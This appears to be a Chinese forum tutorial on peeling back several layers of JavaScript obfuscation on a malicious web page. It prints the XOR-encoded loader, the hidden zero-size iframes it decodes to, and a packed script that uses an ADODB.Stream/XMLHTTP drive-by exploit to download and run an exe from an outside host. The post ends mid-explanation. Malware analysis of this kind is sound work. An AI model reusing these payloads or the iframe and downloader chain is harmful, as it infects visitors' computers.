原创文章,转载请写明出处
才发现的破解javascript各种加密的反向思维方法,大家有好的方法都跟帖啊
最近发现了一个代码,加密了5层左右,我将破解到最后一步,而且不用javascript解密程序
用到的软件列表
1、迅雷(下载网页)直接浏览会执行的,看不到源代码
2、或用firefox这个软件可以直接浏览网址,由于firefox的特殊性,也推荐用这个浏览器
一、目标网址 http://www.e9ad.cn/pcdd/80-806.htm
我们用迅雷下载这个页面或用firefox浏览器浏览得到如下代码
复制代码 代码如下:
<script language=javascript>var DFQC=function(a){return String.fromCharCode
(a^22)};document.write(DFQC(42)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(122)+DFQC(40)+DFQC(27)
+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(126)+DFQC(115)+DFQC(119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC
(28)+DFQC(42)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)+DFQC(98)+DFQC(40)+DFQC(27)
+DFQC(28)+DFQC(54)+DFQC(112)+DFQC(99)+DFQC(120)+DFQC(117)+DFQC(98)+DFQC(127)+DFQC(121)+DFQC
(120)+DFQC(54)+DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC
(109)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115)
+DFQC(43)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)
+DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)+DFQC(112)+DFQC(127)+DFQC(100)
+DFQC(101)+DFQC(98)+DFQC(85)+DFQC(126)+DFQC(127)+DFQC(122)+DFQC(114)+DFQC(56)+DFQC(114)
+DFQC(119)+DFQC(98)+DFQC(119)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC
(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(121)+DFQC(102)+DFQC
(115)+DFQC(120)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)
+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(117)+DFQC(122)
+DFQC(121)+DFQC(101)+DFQC(115)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC
(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(98)
+DFQC(127)+DFQC(98)+DFQC(122)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(113)+DFQC(113)+DFQC(52)+DFQC
(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)
+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)+DFQC(127)
+DFQC(120)+DFQC(120)+DFQC(115)+DFQC(100)+DFQC(94)+DFQC(66)+DFQC(91)+DFQC(90)+DFQC(43)+DFQC
(69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)
+DFQC(107)+DFQC(42)+DFQC(57)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)+DFQC(98)
+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122)+DFQC
(115)+DFQC(40)+DFQC(119)+DFQC(114)+DFQC(42)+DFQC(57)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122)
+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC(115)+DFQC
(119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(116)+DFQC(121)+DFQC(114)
+DFQC(111)+DFQC(54)+DFQC(121)+DFQC(120)+DFQC(122)+DFQC(121)+DFQC(119)+DFQC(114)+DFQC(43)
+DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC(54)+DFQC(98)+DFQC
(121)+DFQC(102)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC
(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(122)+DFQC(115)+DFQC(112)+DFQC(98)+DFQC(123)+DFQC(119)
+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC
(100)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC
(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)+DFQC(98)
+DFQC(98)+DFQC(121)+DFQC(123)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)
+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(55)
+DFQC(59)+DFQC(59)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC
(123)+DFQC(115)+DFQC(54)+DFQC(120)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(95)
+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC
(38)+DFQC(46)+DFQC(38)+DFQC(56)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(52)+DFQC(54)+DFQC(123)
+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)
+DFQC(126)+DFQC(43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC
(113)+DFQC(127)+DFQC(120)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC
(43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)
+DFQC(98)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC
(114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(101)
+DFQC(117)+DFQC(100)+DFQC(121)+DFQC(122)+DFQC(122)+DFQC(127)+DFQC(120)+DFQC(113)+DFQC(43)
+DFQC(52)+DFQC(120)+DFQC(121)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114)
+DFQC(115)+DFQC(100)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(112)+DFQC(100)+DFQC
(119)+DFQC(123)+DFQC(115)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114)+DFQC(115)+DFQC(100)+DFQC
(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100)
+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(59)+DFQC(59)+DFQC
(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)
+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC
(122)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC
(70)+DFQC(66)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(55)+DFQC(59)+DFQC(59)+DFQC
(54)+DFQC(27)+DFQC(28)+DFQC(97)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(121)+DFQC(97)+DFQC(56)
+DFQC(114)+DFQC(115)+DFQC(112)+DFQC(119)+DFQC(99)+DFQC(122)+DFQC(98)+DFQC(69)+DFQC(98)+DFQC
(119)+DFQC(98)+DFQC(99)+DFQC(101)+DFQC(43)+DFQC(52)+DFQC(54)+DFQC(54)+DFQC(52)+DFQC(45)
+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(57)+DFQC(57)+DFQC(59)+DFQC(59)+DFQC(40)+DFQC(54)+DFQC(27)
+DFQC(28)+DFQC(42)+DFQC(57)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC(70)+DFQC(66)+DFQC(40)
+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)
+DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(126)+DFQC(98)+DFQC(98)+DFQC(102)+DFQC
(44)+DFQC(57)+DFQC(57)+DFQC(102)+DFQC(121)+DFQC(102)+DFQC(56)+DFQC(97)+DFQC(108)+DFQC(110)
+DFQC(103)+DFQC(111)+DFQC(56)+DFQC(117)+DFQC(121)+DFQC(123)+DFQC(57)+DFQC(33)+DFQC(33)+DFQC
(33)+DFQC(57)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(115)+DFQC(110)+DFQC(56)+DFQC(126)+DFQC(98)
+DFQC(123)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(38)+DFQC
(54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(43)+DFQC(38)+DFQC(40)
+DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40)
+DFQC(27)+DFQC(28)+DFQC(27)+DFQC(28)+'');</script>
对于这个的解密呢,分析下
大家看下document.write(DFQC(42)+DFQC(126).....
这个DFQC(42),的DFQC就是解密var DFQC=function(a){return String.fromCharCode(a^22)}
下面我的解密代码也想好了,这个方法基本上可以破解好多的类似代码,大家可以看下这个代码
[Ctrl+A 全选 注:引入外部Js需再刷新一下页面才能执行]
得到的解密的代码就是
复制代码 代码如下:
<html>
<head>
<script>
function clear(){
Source=document.body.firstChild.data;
document.open();
document.close();
document.title="gg";
document.body.innerHTML=Source;
}</script>
<title>ad</title>
</head>
<body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<!--
<iframe name="I1" src="/UploadFiles/2021-04-02/8080.htm">
scrolling="no" border="0" frameborder="0"></iframe>
-->
</body>
</html>
<SCRIPT>
<!--
window.defaultStatus=" ";
//-->
</SCRIPT>
<iframe src=http://pop.*****.com/777/index.htm width=0 height=0></iframe>
二、检查下上面的http://www.e9ad.cn/pcdd/8080.htm和http://pop.*****.com/777/index.htm
我发现下面的iframe加载的有问题,所以呢,
用下载工具下载http://pop.*****.com/777/index.htm这个页面的代码可以发现如下
复制代码 代码如下:
<iframe src=http://cc.*****.com/wm/index.htm width=0 height=0></iframe>
<script src='http://s92.cnzz.com/stat.php"codetitle">复制代码 代码如下:
<script language=javascript src=1.js></script>
好的继续下载http://cc.*****.com/wm/1.js这个js文件我得到了这个代码
复制代码 代码如下:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a"v");4.w("y","z:A-B-C-D-E");3 x=4.7
("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3
F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7
("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i)
{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb
er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu
te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s
end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil
e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))
大家看到上面的代码可能会发现无法解密了,我搜了下,发现了,竟然有解密代码了,此处可以分析,不
过我这篇文章的目地,是不用解密程序的,所有我用下面的方法,